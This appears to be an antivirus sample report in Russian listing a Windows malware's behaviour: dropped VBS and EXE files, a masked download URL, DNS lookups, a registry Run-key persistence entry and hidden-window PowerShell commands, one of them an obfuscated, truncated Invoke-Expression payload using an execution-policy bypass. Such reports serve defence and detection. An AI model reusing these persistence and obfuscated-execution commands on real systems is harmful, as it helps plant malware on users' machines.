Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%LOCALAPPDATA%\Microsoft\html.vbs'
- %TEMP%\aut745.tmp
- %TEMP%\setup.exe
- %TEMP%\aut765.tmp
- %LOCALAPPDATA%\html.vbs
- %LOCALAPPDATA%\microsoft\html.vbs
- %TEMP%\aut745.tmp
- %TEMP%\aut765.tmp
- http://ap###w.website/tooor.jpg
- DNS ASK google.com
- DNS ASK ap###w.website
- '%TEMP%\setup.exe'
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\html.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal oE2 $c145;$ClGHPZkofkelnj=@(36,84,98,111,110,101,61,39,42,69,88,39,...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%LOCALAPPDATA%\Microsoft\html.vbs'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "%LOCALAPPDATA%\html.vbs" "%LOCALAPPDATA%\Microsoft\" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal oE2 $c145;$ClGHPZkofkelnj=@(36,84,98,111,110,101,61,39,42,69,88,39,...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%LOCALAPPDATA%\Microsoft\html.vbs'
- '<SYSTEM32>\cmd.exe' /c copy "%LOCALAPPDATA%\html.vbs" "%LOCALAPPDATA%\Microsoft\" /Y